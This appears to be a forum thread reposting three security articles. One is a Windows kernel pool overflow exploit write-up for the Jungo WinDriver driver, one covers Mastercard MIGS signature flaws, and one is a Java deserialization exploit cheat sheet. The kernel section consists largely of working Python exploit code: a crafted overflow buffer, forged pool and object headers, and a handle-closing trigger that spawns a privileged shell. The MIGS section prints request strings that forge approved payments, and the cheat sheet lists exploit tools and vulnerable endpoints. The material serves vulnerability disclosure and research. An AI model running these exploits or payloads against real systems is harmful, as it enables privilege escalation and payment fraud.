(Allocated) Even (Protected) 8674ebe0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ec40 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ec80 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ece0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ed20 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ed80 size: 40 previous size: 60 (Allocated) Even (Protected) 8674edc0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ee20 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ee60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674eec0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ef00 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ef60 size: 40 previous size: 60 (Allocated) Even (Protected) 8674efa0 size: 60 previous size: 40 (Allocated) IoCo (Protected) We can see that the freed chunks have been coalesced and now we have a perfect sized hole. All we need to do is allocate and overwrite. 
def we_can_trigger_the_pool_overflow(): """ This triggers the pool overflow vulnerability using a buffer of size 0x460. """ GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 OPEN_EXISTING = 0x3 DEVICE_NAME = "\\\\.\\WinDrvr1240" dwReturn = c_ulong() driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) inputbuffer = 0x41414141 inputbuffer_size = 0x5000 outputbuffer_size = 0x5000 outputbuffer = 0x20000000 alloc_pool_overflow_buffer(inputbuffer, inputbuffer_size) IoStatusBlock = c_ulong() if driver_handle: dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, None, None, None, byref(IoStatusBlock), 0x953824b7, inputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size) return True return False Surviving the Overflow You may have noticed the null dword in the exploit at offset 0x90 within the buffer. def alloc_pool_overflow_buffer(base, input_size): """ Craft our special buffer to trigger the overflow. """ print "(+) allocating pool overflow input buffer" baseadd = c_int(base) size = c_int(input_size) input = "\x41" * 0x18 # offset to size input += struct.pack("<I", 0x0000008d) # controlled size (this triggers the overflow) input += "\x42" * (0x90-len(input)) # padding to survive bsod input += struct.pack("<I", 0x00000000) # use a NULL dword for sub_4196CA input += "\x43" * ((0x460-0x8)-len(input)) # fill our pool buffer This is needed to survive the overflow and avoid any further processing. The following code listing is executed directly after the copy loop. .text:004199ED loc_4199ED: ; CODE XREF: sub_41998E+41 .text:004199ED push 9 .text:004199EF pop ecx .text:004199F0 lea eax, [ebx+90h] ; controlled from the copy .text:004199F6 push eax ; void * .text:004199F7 lea esi, [edx+6Ch] ; controlled offset .text:004199FA lea eax, [edx+90h] ; controlled offset .text:00419A00 lea edi, [ebx+6Ch] ; controlled from copy .text:00419A03 rep movsd .text:00419A05 push eax ; int .text:00419A06 call sub_4196CA ; call sub_4196CA The important point is that the code will call sub_4196CA. Also note that @eax becomes our buffer +0x90 (0x004199FA). Let’s take a look at that function call. .text:004196CA sub_4196CA proc near ; CODE XREF: sub_4195A6+1E .text:004196CA ; sub_41998E+78 ... .text:004196CA .text:004196CA arg_0 = dword ptr 8 .text:004196CA arg_4 = dword ptr 0Ch .text:004196CA .text:004196CA push ebp .text:004196CB mov ebp, esp .text:004196CD push ebx .text:004196CE mov ebx, [ebp+arg_4] .text:004196D1 push edi .text:004196D2 push 3C8h ; size_t .text:004196D7 push 0 ; int .text:004196D9 push ebx ; void * .text:004196DA call memset .text:004196DF mov edi, [ebp+arg_0] ; controlled buffer .text:004196E2 xor edx, edx .text:004196E4 add esp, 0Ch .text:004196E7 mov [ebp+arg_4], edx .text:004196EA mov eax, [edi] ; make sure @eax is null .text:004196EC mov [ebx], eax ; the write here is fine .text:004196EE test eax, eax .text:004196F0 jz loc_4197CB ; take the jump The code gets a dword value from our SystemBuffer at +0x90, writes to our overflowed buffer and then tests it for null. If it’s null, we can avoid further processing in this function and return. .text:004197CB loc_4197CB: ; CODE XREF: sub_4196CA+26 .text:004197CB pop edi .text:004197CC pop ebx .text:004197CD pop ebp .text:004197CE retn 8 If we don’t do this, we will likley BSOD when attempting to access non-existant pointers from our buffer within this function (we could probably survive this anyway). Now we can return cleanly and trigger the eop without any issues. 
For the shellcode cleanup, our overflowed buffer is stored in @esi, so we can calculate the offset to the TypeIndex and patch it up. Finally, smashing the ObjectCreateInfo with null is fine because the system will simply avoid using that pointer.

Crafting Our Buffer

Since the loop copies 0x8 bytes on every iteration, and since the starting index is 0x1c:

.text:004199D3     lea     ecx, [ebx+1Ch]   ; index offset for the first write

We can do our overflow calculation like so. Let's say we want to overflow the buffer by 44 bytes (0x2c). We take the buffer size, subtract the header, subtract the starting index offset, add the number of bytes we want to overflow, and divide it all by 0x8 (due to the qword copy per loop iteration).

(0x460 - 0x8 - 0x1c + 0x2c) / 0x8 = 0x8d

So a size of 0x8d will overflow the buffer by 0x2c, or 44 bytes. This smashes the pool header, quota and object header.

# repair the allocated chunk header...
input += struct.pack("<I", 0x040c008c)  # _POOL_HEADER
input += struct.pack("<I", 0xef436f49)  # _POOL_HEADER (PoolTag)
input += struct.pack("<I", 0x00000000)  # _OBJECT_HEADER_QUOTA_INFO
input += struct.pack("<I", 0x0000005c)  # _OBJECT_HEADER_QUOTA_INFO
input += struct.pack("<I", 0x00000000)  # _OBJECT_HEADER_QUOTA_INFO
input += struct.pack("<I", 0x00000000)  # _OBJECT_HEADER_QUOTA_INFO
input += struct.pack("<I", 0x00000001)  # _OBJECT_HEADER (PointerCount)
input += struct.pack("<I", 0x00000001)  # _OBJECT_HEADER (HandleCount)
input += struct.pack("<I", 0x00000000)  # _OBJECT_HEADER (Lock)
input += struct.pack("<I", 0x00080000)  # _OBJECT_HEADER (TypeIndex)
input += struct.pack("<I", 0x00000000)  # _OBJECT_HEADER (ObjectCreateInfo)

We can see that we set the TypeIndex to 0x00080000 (actually it's the lower word that matters), so it becomes null. This means that the function table will point to 0x0 and, conveniently enough, we can map the null page.

kd> dd nt!ObTypeIndexTable L2
82b7dee0  00000000 bad0b0b0

Note that the second index is 0xbad0b0b0. I get a funny feeling I can use this same technique on x64 as well :->

Triggering Code Execution in the Kernel

Well, we survive execution after triggering our overflow, but in order to gain EoP we need to set a pointer at 0x00000074 to leverage the OkayToCloseProcedure function pointer.

kd> dt nt!_OBJECT_TYPE name 84fc8040
   +0x008 Name : _UNICODE_STRING "IoCompletionReserve"

kd> dt nt!_OBJECT_TYPE 84fc8040
   +0x000 TypeList : [ 0x84fc8040 - 0x84fc8040 ]
      +0x000 Flink : 0x84fc8040 _LIST_ENTRY [ 0x84fc8040 - 0x84fc8040 ]
      +0x004 Blink : 0x84fc8040 _LIST_ENTRY [ 0x84fc8040 - 0x84fc8040 ]
   +0x008 Name : "IoCompletionReserve"
      +0x000 Length : 0x26
      +0x002 MaximumLength : 0x28
      +0x004 Buffer : 0x88c01090 "IoCompletionReserve"
   +0x010 DefaultObject :
   +0x014 Index : 0x0 ''                        <--- TypeIndex is 0x0
   +0x018 TotalNumberOfObjects : 0x61a9
   +0x01c TotalNumberOfHandles : 0x61a9
   +0x020 HighWaterNumberOfObjects : 0x61a9
   +0x024 HighWaterNumberOfHandles : 0x61a9
   +0x028 TypeInfo :                            <-- TypeInfo is offset 0x28 from 0x0
      +0x000 Length : 0x50
      +0x002 ObjectTypeFlags : 0x2 ''
      +0x002 CaseInsensitive : 0y0
      +0x002 UnnamedObjectsOnly : 0y1
      +0x002 UseDefaultObject : 0y0
      +0x002 SecurityRequired : 0y0
      +0x002 MaintainHandleCount : 0y0
      +0x002 MaintainTypeList : 0y0
      +0x002 SupportsObjectCallbacks : 0y0
      +0x002 CacheAligned : 0y0
      +0x004 ObjectTypeCode : 0
      +0x008 InvalidAttributes : 0xb0
      +0x00c GenericMapping : _GENERIC_MAPPING
      +0x01c ValidAccessMask : 0xf0003
      +0x020 RetainAccess : 0
      +0x024 PoolType : 0 ( NonPagedPool )
      +0x028 DefaultPagedPoolCharge : 0
      +0x02c DefaultNonPagedPoolCharge : 0x5c
      +0x030 DumpProcedure : (null)
      +0x034 OpenProcedure : (null)
      +0x038 CloseProcedure : (null)
      +0x03c DeleteProcedure : (null)
      +0x040 ParseProcedure : (null)
      +0x044 SecurityProcedure : 0x82cb02ac long nt!SeDefaultObjectMethod+0
      +0x048 QueryNameProcedure : (null)
      +0x04c OkayToCloseProcedure : (null)       <--- OkayToCloseProcedure is offset 0x4c from 0x0
   +0x078 TypeLock :
      +0x000 Locked : 0y0
      +0x000 Waiting : 0y0
      +0x000 Waking : 0y0
      +0x000 MultipleShared : 0y0
      +0x000 Shared : 0y0000000000000000000000000000 (0)
      +0x000 Value : 0
      +0x000 Ptr : (null)
   +0x07c Key : 0x6f436f49
   +0x080 CallbackList : [ 0x84fc80c0 - 0x84fc80c0 ]
      +0x000 Flink : 0x84fc80c0 _LIST_ENTRY [ 0x84fc80c0 - 0x84fc80c0 ]
      +0x004 Blink : 0x84fc80c0 _LIST_ENTRY [ 0x84fc80c0 - 0x84fc80c0 ]

So, 0x28 + 0x4c = 0x74, which is where our pointer needs to be. But how is the OkayToCloseProcedure called? It turns out that this is a registered callback which the object manager invokes when a handle to the object is closed. So to trigger code execution, one just needs to free the corrupted IoCompletionReserve. We don't know which handle is associated with the overflowed chunk, so we just free them all.

def trigger_lpe():
    """
    This function frees the IoCompletionReserve objects; closing the handles
    triggers the registered OkayToCloseProcedure, which is our controlled pointer.
    """
    # free the corrupted chunk to trigger OkayToCloseProcedure
    for k, v in khandlesd.iteritems():
        kernel32.CloseHandle(v)
    os.system("cmd.exe")

Obligatory, full-sized screenshot:

Timeline

2017-08-22 – Verified and sent to Jungo via {sales,first,security,info}@jungo.com.
2017-08-25 – No response from Jungo and two bounced emails.
2017-08-26 – Attempted a follow up with the vendor via website chat.
2017-08-26 – No response via the website chat.
2017-09-03 – Received an email from a Jungo representative stating that they are "looking into it".
2017-09-03 – Requested a timeframe for patch development and warned of possible 0day release.
2017-09-06 – No response from Jungo.
2017-09-06 – Public 0day release of advisory.

Some people ask how long it takes me to develop exploits. Honestly, since the kernel is new to me, it took me a little longer than normal. For vulnerability analysis and exploitation of this bug, it took me 1.5 days (over the weekend), which is relatively slow for an older platform.

Conclusion

Any chunk size that is < 0x1000 can be exploited in this manner.
As mentioned, this is not a new technique, but merely a variation of an already existing technique, and one that I wouldn't have discovered had I stuck to exploiting HEVD. Having said that, the ability to take a pre-existing vulnerable driver and develop exploitation techniques from it proves to be invaluable.

Kernel pool determinism is strong, simply because if you randomize more of the kernel, the operating system takes a performance hit. The balance between security and performance has always been problematic, and it isn't always so clear unless you are dealing directly with the kernel.

References

https://github.com/hacksysteam/HackSysExtremeVulnerableDriver
http://www.fuzzysecurity.com/tutorials/expDev/20.html
https://media.blackhat.com/bh-dc-11/Mandt/BlackHat_DC_2011_Mandt_kernelpool-Slides.pdf
https://msdn.microsoft.com/en-us/library/windows/desktop/ms724485(v=vs.85).aspx
https://www.exploit-db.com/exploits/34272

Shoutouts to beef, sicky, ryujin, skylined and bee13oy for the help!

Here, you can find the advisory and the exploit.

Sursa: http://srcincite.io/blog/2017/09/06/sharks-in-the-pool-mixed-object-exploitation-in-the-windows-kernel-pool.html
  21. Eh, there are plenty of non-alumni who can write.
  22. Mastercard Internet Gateway Service: Hashing Design Flaw

Last year I found a design error in the MD5 version of the hashing method used by the Mastercard Internet Gateway Service. The flaw allows modification of the transaction amount, and they awarded me a bounty for reporting it. This year they switched to HMAC-SHA256, but that version also has a flaw (and no response from MasterCard).

If you just want to know what the bug is, skip to the Flaw part.

What is MIGS?

When you pay on a website, the website owner usually just connects their system to an intermediate payment gateway (you will be forwarded to another website). This payment gateway then connects to several payment systems available in a country. For credit card payments, many gateways connect to another gateway (one of them is MIGS) which works with many banks to provide the 3-D Secure service.

How does it work?

The payment flow is usually like this if you use MIGS:

You select items from an online store (merchant)
You enter your credit card number on the website
The card number, amount, etc. are then signed and returned to the browser, which will auto-POST to the intermediate payment gateway
The intermediate payment gateway converts the format to the one requested by MIGS, signs it (with the MIGS key), and returns it to the browser. Again this will auto-POST, this time to the MIGS server.
If 3-D Secure is not requested, go to step 6. If 3-D Secure is requested, MIGS redirects the request to the bank that issued the card, the bank asks for an OTP, and then generates HTML that will auto-POST data back to MIGS
MIGS returns signed data to the browser, which will auto-POST the data back to the intermediate gateway
The intermediate gateway checks whether the data is valid based on the signature. If it is not valid, an error page is generated
Based on the MIGS response, the payment gateway forwards the status to the merchant

Notice that instead of the servers communicating directly, communication is done via the user's browser, but everything is signed. In theory, if the signing and verification processes are correct, everything will be fine. Unfortunately, this is not always the case.

Flaw in the MIGS MD5 Hashing

This bug is extremely simple. The hashing method used is:

MD5(Secret + Data)

But it was not vulnerable to a hash length extension attack (some checks were done to prevent this). The data is created like this: for every query parameter that starts with vpc_, sort by name, then concatenate the values only, without a delimiter.

For example, if we have this data:

Name: Joe
Amount: 10000
Card: 1234567890123456

vpc_Name=Joe&Vpc_Amount=10000&vpc_Card=1234567890123456

Sort it:

vpc_Amount=10000
vpc_Card=1234567890123456
vpc_Name=Joe

Get the values, and concatenate them:

100001234567890123456Joe

Note that if I change the parameters:

vpc_Name=Joe&Vpc_Amount=1&vpc_Card=1234567890123456&vpc_B=0000

Sort it:

vpc_Amount=1
vpc_B=0000
vpc_Card=1234567890123456
vpc_Name=Joe

Get the values, and concatenate them:

100001234567890123456Joe

The MD5 value is still the same.

So basically, when the data is being sent to MIGS, we can insert an additional parameter after the amount to eat the last digits, or in front of it to eat the first digits, and the amount is slashed: you can pay for a 2000 USD MacBook with 2 USD.

Intermediate gateways and merchants can work around this bug by always checking that the amount returned by MIGS is the same as the amount requested.

MasterCard rewarded me with 8500 USD for this bug.
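To make the collision concrete, here is a small, hedged reproduction of the scheme described above (the function name and secret are placeholders of mine, not MIGS code): sort the vpc_-prefixed parameters by name, concatenate only their values, and MD5 the secret plus that string.

# Hedged sketch: both parameter sets concatenate to "100001234567890123456Joe",
# so they produce the same signature even though the amounts differ.
import hashlib

def migs_md5_signature(secret, params):
    data = "".join(v for k, v in sorted(params.items()) if k.lower().startswith("vpc_"))
    return hashlib.md5((secret + data).encode()).hexdigest()

secret   = "not-the-real-secret"
legit    = {"vpc_Name": "Joe", "vpc_Amount": "10000", "vpc_Card": "1234567890123456"}
tampered = {"vpc_Name": "Joe", "vpc_Amount": "1", "vpc_B": "0000", "vpc_Card": "1234567890123456"}

assert migs_md5_signature(secret, legit) == migs_md5_signature(secret, tampered)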
Flaw in the HMAC-SHA256 Hashing

The new HMAC-SHA256 has a flaw that can be exploited if we can inject invalid values into intermediate payment gateways. I have verified that at least one payment gateway (Fusion Payments) has this bug, and I was rewarded 500 USD by Fusion Payments. It may affect other payment gateways that connect to MIGS.

In the new version, they added delimiters (&) between fields, added field names and not just values, and used HMAC-SHA256. For the same data above, the hashed data is:

Vpc_Amount=10000&vpc_Card=1234567890123456&vpc_Name=Joe

We can't shift anything, so everything should be fine. But what happens if a value contains & or = or other special characters? Reading the documentation, it says:

Note: The values in all name value pairs should NOT be URL encoded for the purpose of hashing.

The "NOT" is my emphasis. It means that if we have these fields:

Amount=100
Card=1234
CVV=555

it will be hashed as:

HMAC(Amount=100&Card=1234&CVV=555)

And if we have this (the Amount value contains & and =):

Amount=100&Card=1234
CVV=555

it will be hashed as:

HMAC(Amount=100&Card=1234&CVV=555)

The same as before. Still not really a problem at this point. Of course, I thought that maybe the documentation was wrong, maybe the values should be encoded. But I checked the behavior of the MIGS server, and it behaves as documented. Maybe they don't want to deal with different encodings (such as + instead of %20).

There doesn't seem to be any problem with that; any invalid values will be checked by MIGS and will cause an error (for example, the invalid amount above will be rejected). But I noticed that several payment gateways, instead of validating inputs on their server side, just sign everything and hand it to MIGS. It's much easier to do only JavaScript checks on the client side, sign the data on the server side, and let MIGS decide whether the card number is correct, whether the CVV should be 3 or 4 digits, whether the expiration date is correct, etc. The logic is: MIGS will recheck the inputs, and will do it better.

At Fusion Payments, I found that this is exactly what happened: they allow characters of any kind and any length to be sent for the CVV (checked only in JavaScript), sign the request and send it to MIGS.

Exploit

To exploit this we need to construct a string which is both a valid request and a valid MIGS server response. We don't need to contact the MIGS server at all; we are forcing the client to sign valid data for itself.
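The issue is easier to see with a small, hedged sketch of the canonicalization described above (the helper name and secret are mine, and the field sets are simplified, not the exact exploit strings): because values are not URL-encoded before hashing, a single malicious value containing & and = canonicalizes to the same string as several separate fields, so both messages carry an identical HMAC.

# Hedged sketch: a CVV value stuffed with "&...=..." pairs hashes identically
# to a message where those pairs are genuine top-level fields.
import hashlib, hmac

def migs_hmac(secret, params):
    canonical = "&".join("%s=%s" % (k, v) for k, v in sorted(params.items()))
    return hmac.new(secret, canonical.encode(), hashlib.sha256).hexdigest()

secret = b"not-the-real-merchant-secret"

# What the gateway thinks it is signing: one CVV field with a strange value
signed_by_gateway = {
    "vpc_Amount": "25",
    "vpc_CardSecurityCode": "999&vpc_Message=Approved&vpc_TxnResponseCode=0",
}

# What the attacker later presents: the injected pieces as real fields
replayed_to_gateway = {
    "vpc_Amount": "25",
    "vpc_CardSecurityCode": "999",
    "vpc_Message": "Approved",
    "vpc_TxnResponseCode": "0",
}

assert migs_hmac(secret, signed_by_gateway) == migs_hmac(secret, replayed_to_gateway)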
A basic request looks like this:

vpc_AccessCode=9E33F6D7&vpc_Amount=25&vpc_Card=Visa&vpc_CardExp=1717&vpc_CardNum=4599777788889999&vpc_CardSecurityCode=999&vpc_OrderInfo=ORDERINFO&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256

and a basic response from the server looks like this:

vpc_Message=Approved&vpc_OrderInfo=ORDERINFO&vpc_ReceiptNo=722819658213&vpc_TransactionNo=2000834062&vpc_TxnResponseCode=0&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256

In Fusion Payments' case, the exploit is done by injecting into vpc_CardSecurityCode (the CVV):

vpc_AccessCode=9E33F6D7&vpc_Amount=25&vpc_Card=Visa&vpc_CardExp=1717&vpc_CardNum=4599777788889999&vpc_CardSecurityCode=999%26vpc_Message%3DApproved%26vpc_OrderInfo%3DORDERINFO%26vpc_ReceiptNo%3D722819658213%26vpc_TransactionNo%3D2000834062%26vpc_TxnResponseCode%3D0%26vpc_Z%3Da&vpc_OrderInfo=ORDERINFO&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256

The client/payment gateway will generate the correct hash for this string.

Now we can post this data back to the client itself (without ever going to the MIGS server), but we change it slightly so that the client will read the correct variables (most clients will only check vpc_TxnResponseCode and vpc_TransactionNo):

vpc_AccessCode=9E33F6D7%26vpc_Amount%3D25%26vpc_Card%3DVisa%26vpc_CardExp%3D1717%26vpc_CardNum%3D4599777788889999%26vpc_CardSecurityCode%3D999&vpc_Message=Approved&vpc_OrderInfo=ORDERINFO&vpc_ReceiptNo=722819658213&vpc_TransactionNo=2000834062&vpc_TxnResponseCode=0&vpc_Z=a%26vpc_OrderInfo%3DORDERINFO&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256

Note that:

This will be hashed the same as the previous data
The client will ignore vpc_AccessCode and the value inside it
The client will process vpc_TxnResponseCode, etc., and assume the transaction is valid

It can be said that this is a MIGS client bug, but the hashing method chosen by MasterCard allows it to happen; had the values been encoded, this bug would not be possible.

Response from MIGS

MasterCard did not respond to this bug in the HMAC-SHA256. When reporting it I CC-ed several people who handled the previous bug. None of the emails bounced. Not even a "we are checking this" email from them. They also have my Facebook in case they need to contact me (this is from the interaction about the MD5 bug).

Some people are sneaky and will try to deny that they have received a bug report, so now when reporting a bug, I put it in a password-protected post (that is why you can see several password-protected posts in this blog). So far there have been at least 3 views from MasterCard IP addresses (3 views that entered the password). They have to type in a password to read the report, so it is impossible for them to have accidentally clicked it without reading it. I have nagged them every week for a reply. My expectation was that they would at least try to warn everyone connecting to their system to check and filter for injections.

Flaws In Payment Gateways

As an extra note: even though payment gateways handle money, they are not as secure as people think. During my pentests I found several flaws in the design of the payment protocols of several intermediate gateways. Unfortunately, I can't go into detail on those (when I say "pentests", it means work under NDA). I also found flaws in implementations, for example a hash length extension attack, XML signature verification errors, etc.

One of the simplest bugs I found is in Fusion Payments. The first bug I found was: they didn't even check the signature from MIGS.
That means we can just alter the data returned by MIGS and mark the transaction as successful. This means changing a single character from F (false) to 0 (success). So basically we can enter any credit card number, get a failed response from MIGS, change it, and suddenly the payment is successful.

This is a 20 million USD company, and I got 400 USD for this bug. This is not the first payment gateway to have this flaw; during a pentest I found the exact same bug in another payment gateway.

Despite the relatively low bounty, Fusion Payments is currently the only payment gateway I contacted that is very clear about its bug bounty program, and is very quick in responding to my emails and fixing their bugs.

Conclusion

Payment gateways are not as secure as you think. With the relatively low bounties (and in several cases that I have reported: 0 USD), I wonder how many people have already exploited bugs in payment gateways.

Sursa: http://tinyhack.com/2017/09/05/mastercard-internet-gateway-service-hashing-design-flaw/
  23. Great, only a little over two months have passed since the last post.
  24. Java-Deserialization-Cheat-Sheet A cheat sheet for pentesters and researchers about deserialization vulnerabilities in various Java (JVM) serialization libraries. Please, use #javadeser hash tag for tweets. Table of content Java Native Serialization (binary) Overview Main talks & presentations & docs Payload generators Exploits Detect Vulnerable apps (without public sploits/need more info) Protection For Android XMLEncoder (XML) XStream (XML/JSON/various) Kryo (binary) Hessian/Burlap (binary/XML) Castor (XML) json-io (JSON) Jackson (JSON) Red5 IO AMF (AMF) Apache Flex BlazeDS (AMF) Flamingo AMF (AMF) GraniteDS (AMF) WebORB for Java (AMF) SnakeYAML (YAML) jYAML (YAML) YamlBeans (YAML) "Safe" deserialization Java Native Serialization (binary) Overview Java Deserialization Security FAQ From Foxgloves Security Main talks & presentations & docs Marshalling Pickles by @frohoff & @gebl Video Slides Other stuff Exploiting Deserialization Vulnerabilities in Java by @matthias_kaiser Video Serial Killer: Silently Pwning Your Java Endpoints by @pwntester & @cschneider4711 Slides White Paper Bypass Gadget Collection Deserialize My Shorts: Or How I Learned To Start Worrying and Hate Java Object Deserialization by @frohoff & @gebl Slides Surviving the Java serialization apocalypse by @cschneider4711 & @pwntester Slides Video PoC for Scala, Grovy Java Deserialization Vulnerabilities - The Forgotten Bug Class by @matthias_kaiser Slides Pwning Your Java Messaging With Deserialization Vulnerabilities by @matthias_kaiser Slides White Paper Tool for jms hacking Defending against Java Deserialization Vulnerabilities by @lucacarettoni Slides A Journey From JNDI/LDAP Manipulation To Remote Code Execution Dream Land by @pwntester and O. Mirosh Slides White Paper Fixing the Java Serialization mess by @e_rnst Slides+Source Blind Java Deserialization by deadcode.me Part I - Commons Gadgets Part II - exploitation rev 2 Payload generators ysoserial https://github.com/frohoff/ysoserial RCE (or smth else) via: Apache Commons Collections <= 3.1 Apache Commons Collections <= 4.0 Groovy <= 2.3.9 Spring Core <= 4.1.4 (?) JDK <=7u21 Apache Commons BeanUtils 1.9.2 + Commons Collections <=3.1 + Commons Logging 1.2 (?) 
BeanShell 2.0 Groovy 2.3.9 Jython 2.5.2 C3P0 0.9.5.2 Apache Commons Fileupload <= 1.3.1 (File uploading, DoS) ROME 1.0 MyFaces JRMPClient/JRMPListener JSON Hibernate Additional tools (integration ysoserial with Burp Suite): JavaSerialKiller Java Deserialization Scanner Burp-ysoserial Full shell (pipes, redirects and other stuff): $@|sh – Or: Getting a shell environment from Runtime.exec Set String[] for Runtime.exec (patch ysoserial's payloads) Shell Commands Converter How it works: https://blog.srcclr.com/commons-collections-deserialization-vulnerability-research-findings/ http://gursevkalra.blogspot.ro/2016/01/ysoserial-commonscollections1-exploit.html JRE8u20_RCE_Gadget https://github.com/pwntester/JRE8u20_RCE_Gadget Pure JRE 8 RCE Deserialization gadget ACEDcup https://github.com/GrrrDog/ACEDcup File uploading via: Apache Commons FileUpload <= 1.3 (CVE-2013-2186) and Oracle JDK < 7u40 Universal billion-laughs DoS https://gist.github.com/coekie/a27cc406fc9f3dc7a70d Won't fix DoS via default Java classes (JRE) Universal Heap overflows DoS using Arrays and HashMaps https://github.com/topolik/ois-dos/ How it works: Java Deserialization DoS - payloads Won't fix DoS using default Java classes (JRE) Exploits no spec tool - You don't need a special tool (just Burp/ZAP + payload) RMI Protocol Default - 1099/tcp for rmiregistry ysoserial (works only against a RMI registry service) JMX Protocol based on RMI CVE-2016-3427 partially patched in JRE ysoserial JexBoss JNDI/LDAP When we control an adrress for lookup of JNDI (context.lookup(address) and can have backconnect from a server Full info JNDI remote code injection https://github.com/zerothoughts/jndipoc JMS Full info JMET JSF ViewState if no encryption or good mac no spec tool JexBoss T3 of Oracle Weblogic Protocol Default - 7001/tcp on localhost interface CVE-2015-4852 loubia (tested on 11g and 12c, supports t3s) JavaUnserializeExploits (doesn't work for all Weblogic versions) IBM Websphere 1 wsadmin Default port - 8880/tcp CVE-2015-7450 JavaUnserializeExploits serialator IBM Websphere 2 When using custom form authentication WASPostParam cookie Full info no spec tool Red Hat JBoss http://jboss_server/invoker/JMXInvokerServlet Default port - 8080/tcp CVE-2015-7501 JavaUnserializeExploits https://github.com/njfox/Java-Deserialization-Exploit serialator JexBoss Jenkins Jenkins CLI Default port - High number/tcp CVE-2015-8103 CVE-2015-3253 JavaUnserializeExploits JexBoss Jenkins 2 patch "bypass" for Jenkins CVE-2016-0788 Details of exploit ysoserial Jenkins 3 Jenkins CLI LDAP Default port - High number/tcp <= 2.32 <= 2.19.3 (LTS) CVE-2016-9299 Metasploit Module for CVE-2016-9299 Restlet <= 2.1.2 When Rest API accepts serialized objects (uses ObjectRepresentation) no spec tool RESTEasy *When Rest API accepts serialized objects (uses @Consumes({"*/*"}) or "application/*" ) Details and examples no spec tool OpenNMS RMI ysoserial Progress OpenEdge RDBMS all versions RMI ysoserial Commvault Edge Server CVE-2015-7253 Serialized object in cookie no spec tool Symantec Endpoint Protection Manager /servlet/ConsoleServlet?ActionType=SendStatPing CVE-2015-6555 serialator Oracle MySQL Enterprise Monitor https://[target]:18443/v3/dataflow/0/0 CVE-2016-3461 no spec tool serialator PowerFolder Business Enterprise Suite custom(?) 
protocol (1337/tcp) MSA-2016-01 powerfolder-exploit-poc Solarwinds Virtualization Manager <= 6.3.1 RMI CVE-2016-3642 ysoserial Cisco Prime Infrastructure https://[target]/xmp_data_handler_service/xmpDataOperationRequestServlet <= 2.2.3 Update 4 <= 3.0.2 CVE-2016-1291 CoalfireLabs/java_deserialization_exploits Cisco ACS <= 5.8.0.32.2 RMI (2020 tcp) CSCux34781 ysoserial Apache XML-RPC all version, no fix (the project is not supported) POST XML request with ex:serializable element Details and examples no spec tool Apache Archiva because it uses Apache XML-RPC CVE-2016-5004 Details and examples no spec tool SAP NetWeaver https://[target]/developmentserver/metadatauploader CVE-2017-9844 PoC Sun Java Web Console admin panel for Solaris < v3.1. old DoS sploit no spec tool Apache MyFaces Trinidad 1.0.0 <= version < 1.0.13 1.2.1 <= version < 1.2.14 2.0.0 <= version < 2.0.1 2.1.0 <= version < 2.1.1 it does not check MAC CVE-2016-5004 no spec tool Apache Tomcat JMX JMX Patch bypass CVE-2016-8735 JexBoss OpenText Documentum D2 version 4.x CVE-2017-5586 exploit Apache ActiveMQ - Client lib JMS JMET Redhat/Apache HornetQ - Client lib JMS JMET Oracle OpenMQ - Client lib JMS JMET IBM WebSphereMQ - Client lib JMS JMET Oracle Weblogic - Client lib JMS JMET Pivotal RabbitMQ - Client lib JMS JMET IBM MessageSight - Client lib JMS JMET IIT Software SwiftMQ - Client lib JMS JMET Apache ActiveMQ Artemis - Client lib JMS JMET Apache QPID JMS - Client lib JMS JMET Apache QPID - Client lib JMS JMET Amazon SQS Java Messaging - Client lib JMS JMET Detect Code review ObjectInputStream.readObject ObjectInputStream.readUnshared Tool: Find Security Bugs Tool: Serianalyzer Traffic Magic bytes 'ac ed 00 05' bytes 'rO0' for Base64 'application/x-java-serialized-object' for Content-Type header Network Nmap >=7.10 has more java-related probes use nmap --all-version to find JMX/RMI on non-standart ports Burp plugins Java Deserialization Scanner SuperSerial SuperSerial-Active Vulnerable apps (without public sploits/need more info) Spring Service Invokers (HTTP, JMS, RMI...) SAP P4 info from slides Apache SOLR SOLR-8262 5.1 <= version <=5.4 /stream handler uses Java serialization for RPC Apache Shiro SHIRO-550 encrypted cookie (with the hardcoded key) Apache ActiveMQ (2) CVE-2015-5254 <= 5.12.1 Explanation of the vuln CVE-2015-7253 Atlassian Bamboo (1) CVE-2015-6576 2.2 <= version < 5.8.5 5.9.0 <= version < 5.9.7 Atlassian Bamboo (2) CVE-2015-8360 2.3.1 <= version < 5.9.9 Bamboo JMS port (port 54663 by default) Atlassian Jira only Jira with a Data Center license RMI (port 40001 by default) JRA-46203 Akka version < 2.4.17 "an ActorSystem exposed via Akka Remote over TCP" Official description Spring AMPQ CVE-2016-2173 1.0.0 <= version < 1.5.5 Apache Tika CVE-2016-6809 1.6 <= version < 1.14 Apache Tika’s MATLAB Parser Apache HBase HBASE-14799 Apache Camel CVE-2015-5348 Gradle (gui) custom(?) 
